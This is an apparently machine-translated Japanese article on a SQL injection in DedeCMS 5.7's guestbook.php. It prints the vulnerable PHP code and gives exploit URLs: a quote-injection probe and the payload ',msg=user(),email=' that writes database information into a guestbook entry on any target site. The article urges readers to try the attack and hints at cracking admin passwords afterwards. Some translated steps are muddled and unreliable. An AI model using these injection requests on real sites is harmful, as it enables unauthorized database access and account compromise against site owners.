dedecms5.7 の最新 SQL が guestbook.php インジェクションの脆弱性を悪用

この記事の内容は、guestbook.php を使用した dedecms5.7 の最新の SQL インジェクションの脆弱性に関するものです。必要な方は参考にしてください。

影響を受けるバージョンは 5.7 です。脆弱性ファイル edit.inc .php 固有のコード:

< ?php  

if(!defined(&#39;DEDEINC&#39;)) exit(&#39;Request Error!&#39;);  

   

if(!empty($_COOKIE[&#39;GUEST_BOOK_POS&#39;])) $GUEST_BOOK_POS = $_COOKIE[&#39;GUEST_BOOK_POS&#39;];  

else $GUEST_BOOK_POS = "guestbook.php";  

   

$id = intval($id);  

if(empty($job)) $job=&#39;view&#39;;  

   

if($job==&#39;del&#39; && $g_isadmin)  

{  

$dsql->ExecuteNoneQuery(" DELETE FROM `#@__guestbook` WHERE id='$id' ");  

ShowMsg("成功删除一条留言！", $GUEST_BOOK_POS);  

exit();  

}  

else if($job=='check' && $g_isadmin)  

{  

$dsql->ExecuteNoneQuery(" UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' ");  

ShowMsg("成功审核一条留言！", $GUEST_BOOK_POS);  

exit();  

}  

else if($job=='editok')  

{  

$remsg = trim($remsg);  

if($remsg!='')  

{  

//管理员回复不过滤HTML By:Errorera blog:errs.cc  

if($g_isadmin)  

{  

$msg = "<p class=&#39;rebox&#39;>".$msg."</p>\n".$remsg;  

//$remsg <br /><font color=red>管理员回复：</font> }  

else 

{  

$row = $dsql->GetOne("SELECT msg From `#@__guestbook` WHERE id='$id' ");  

$oldmsg = "<p class=&#39;rebox&#39;>".addslashes($row['msg'])."</p>\n";  

$remsg = trimMsg(cn_substrR($remsg, 1024), 1);  

$msg = $oldmsg.$remsg;  

}  

}  

//这里没有对$msg过滤，导致可以任意注入了By:Errorera home:www.errs.cc  

$dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");  

ShowMsg("成功更改或回复一条留言！", $GUEST_BOOK_POS);  

exit();  

}  

//home:www.errs.cc  

if($g_isadmin)  

{  

$row = $dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id'");  

require_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');  

}  

else 

{  

$row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id'");  

require_once(DEDETEMPLATE.'/plus/guestbook-user.htm');  

}

脆弱性が成功するための要件:

1. php magic_quotes_gpc=off

2. 脆弱性ファイルが存在する plus/guestbook.php dede_guestbook テーブルも存在する必要があります。

脆弱性があるかどうかの判断方法:

まず www.xxx.com/plus/guestbook.php を開くと、他の人のメッセージが表示されます

次に、[返信/編集] にマウスを置くと ID が表示されます。他の人のメッセージの。次にIDをメモします
Visit:

www.xxx.com/plus/guestbook.php?action=admin&job=editok&msg=errs.cc'&id=存在的留言ID

送信後、dede5.7バージョンの場合は「変更が成功したか、メッセージに返信されました」と表示され、変更が成功したことが証明されますwww.xxx.comに戻ります/plus/guestbook.php 変更したメッセージ ID が errs.cc になっているかどうかを確認します

そうであれば、脆弱性が悪用できないことが証明されており、php magic_quotes_gpc=off をオンにする必要があります

変更が次の場合成功しませんでした。メッセージ ID の内容はまだです。前のメッセージは、この脆弱性が悪用できることを証明しました。

再度アクセスして

www.xxx.com/plus/guestbook.php?action=admin&job=editok&id=存在的留言ID&msg=',msg=user(),email='

して戻ってくると、メッセージIDの内容が直接mysql user()に変更されます。

おそらくこんな感じの使い方だと思いますので、興味のある方はぜひ勉強してみてください！ ！

最後に、管理バックエンドアカウントのパスワードを破る方法について言う人もいるかもしれませんが、それは自分で調べればわかります。とにかく絶対バレる（バレないなら載せない）！ ！

りー

以上がdedecms5.7 の最新 SQL が guestbook.php インジェクションの脆弱性を悪用の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。